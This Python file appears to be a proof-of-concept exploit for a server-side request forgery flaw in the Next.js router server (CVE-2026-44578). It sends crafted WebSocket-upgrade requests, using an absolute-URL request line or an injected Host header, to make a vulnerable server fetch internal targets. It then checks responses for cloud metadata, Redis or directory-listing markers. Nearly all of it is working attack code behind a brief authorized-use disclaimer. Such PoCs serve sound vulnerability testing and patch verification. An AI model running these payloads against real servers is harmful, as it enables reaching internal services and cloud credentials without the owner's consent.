#!/usr/bin/env python3 # Disclaimer: For authorized security research and educational use only. # Do not use this tool on systems you do not own or have explicit written # permission to test. """ PoC: CVE-2026-44578 / GHSA-c4j6-fc7j-m34r Next.js router-server WebSocket-Upgrade SSRF (<= v16.2.4) """ from __future__ import annotations import argparse import socket import sys import time from contextlib import closing R = "\033[31m"; G = "\033[32m"; Y = "\033[33m"; B = "\033[34m"; C = "\033[36m" BOLD = "\033[1m"; RESET = "\033[0m" def banner(msg: str, color: str = C) -> None: print(f"\n{color}{BOLD}{'═'*78}\n {msg}\n{'═'*78}{RESET}") def info(msg: str) -> None: print(f"{B}[*]{RESET} {msg}") def good(msg: str) -> None: print(f"{G}[+]{RESET} {msg}") def warn(msg: str) -> None: print(f"{Y}[!]{RESET} {msg}") def bad(msg: str) -> None: print(f"{R}[-]{RESET} {msg}") WS_HEADERS = ( "Upgrade: websocket\r\n" "Connection: Upgrade\r\n" "Sec-WebSocket-Version: 13\r\n" "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n" ) def absolute_url_payload(next_host: str, target: str, path: str) -> bytes: return ( f"GET http://{target}{path} HTTP/1.1\r\n" f"Host: {next_host}\r\n" f"{WS_HEADERS}" "\r\n" ).encode("latin1") def host_header_payload(next_host: str, target: str, path: str) -> bytes: return ( f"GET {path} HTTP/1.1\r\n" f"Host: {target}\r\n" f"X-Forwarded-Host: {target}\r\n" f"{WS_HEADERS}" "\r\n" ).encode("latin1") def send_raw(next_host: str, next_port: int, payload: bytes, timeout: float = 5.0) -> bytes: sock = socket.create_connection((next_host, next_port), timeout=timeout) chunks: list[bytes] = [] with closing(sock): sock.sendall(payload) sock.settimeout(timeout) try: while True: chunk = sock.recv(65536) if not chunk: break chunks.append(chunk) except socket.timeout: pass return b"".join(chunks) SSRF_MARKERS = [ b"SSRF_CONFIRMED", # lab-only marker from controlled mock internal targets b"ami-id", b"computeMetadata", b"Server: SimpleHTTP/", b"Directory listing for", b"redis_version", ] def looks_like_ssrf(response: bytes) -> tuple[bool, str]: for m in SSRF_MARKERS: if m in response: return True, m.decode("latin1", errors="replace") head = response[:200].decode("latin1", errors="replace").lower() if head and "next" not in head and "404" not in head and "400" not in head and "200" in head: return True, "non-Next 200 response" return False, "" def run_variant(name: str, payload: bytes, next_host: str, next_port: int) -> bool: banner(f"VARIANT: {name}", C) info(f"→ payload ({len(payload)} bytes):") print(f"{Y}{payload.decode('latin1')}{RESET}") info(f"sending to {next_host}:{next_port} ...") t0 = time.time() try: resp = send_raw(next_host, next_port, payload) except Exception as e: bad(f"socket error: {e}") return False dt = time.time() - t0 info(f"received {len(resp)} bytes in {dt:.2f}s") print(f"{Y}---- RESPONSE ----{RESET}") print(resp.decode("latin1", errors="replace")) print(f"{Y}------------------{RESET}") is_ssrf, marker = looks_like_ssrf(resp) if is_ssrf: good(f"{BOLD}SSRF CONFIRMED{RESET} (marker: {marker!r})") return True warn("response did not contain an SSRF marker — server may already be patched (v16.2.5+)") return False def main() -> int: p = argparse.ArgumentParser(description="CVE-2026-44578 PoC") p.add_argument("--next", default="127.0.0.1:3000", help="vulnerable Next.js host:port") p.add_argument("--target", default="127.0.0.1:9999", help="internal target host:port") p.add_argument("--path", default="/", help="path on the internal target") p.add_argument("--variant", choices=["absolute", "host", "both"], default="both") args = p.parse_args() next_host, next_port_s = args.next.split(":") next_port = int(next_port_s) next_authority = f"{next_host}:{next_port}" banner("CVE-2026-44578 — Next.js router-server upgrade SSRF", R) info(f"Next.js target : {next_authority}") info(f"Internal target : {args.target}{args.path}") pwned = False if args.variant in ("absolute", "both"): pwned |= run_variant("absolute-URL request-line", absolute_url_payload(next_authority, args.target, args.path), next_host, next_port) if args.variant in ("host", "both"): pwned |= run_variant("Host-header injection", host_header_payload(next_authority, args.target, args.path), next_host, next_port) banner("RESULT", G if pwned else R) if pwned: good("Target is VULNERABLE (Next.js < 16.2.5)") return 0 bad("No SSRF observed — target appears patched (Next.js >= 16.2.5) or unreachable") return 2 if __name__ == "__main__": sys.exit(main())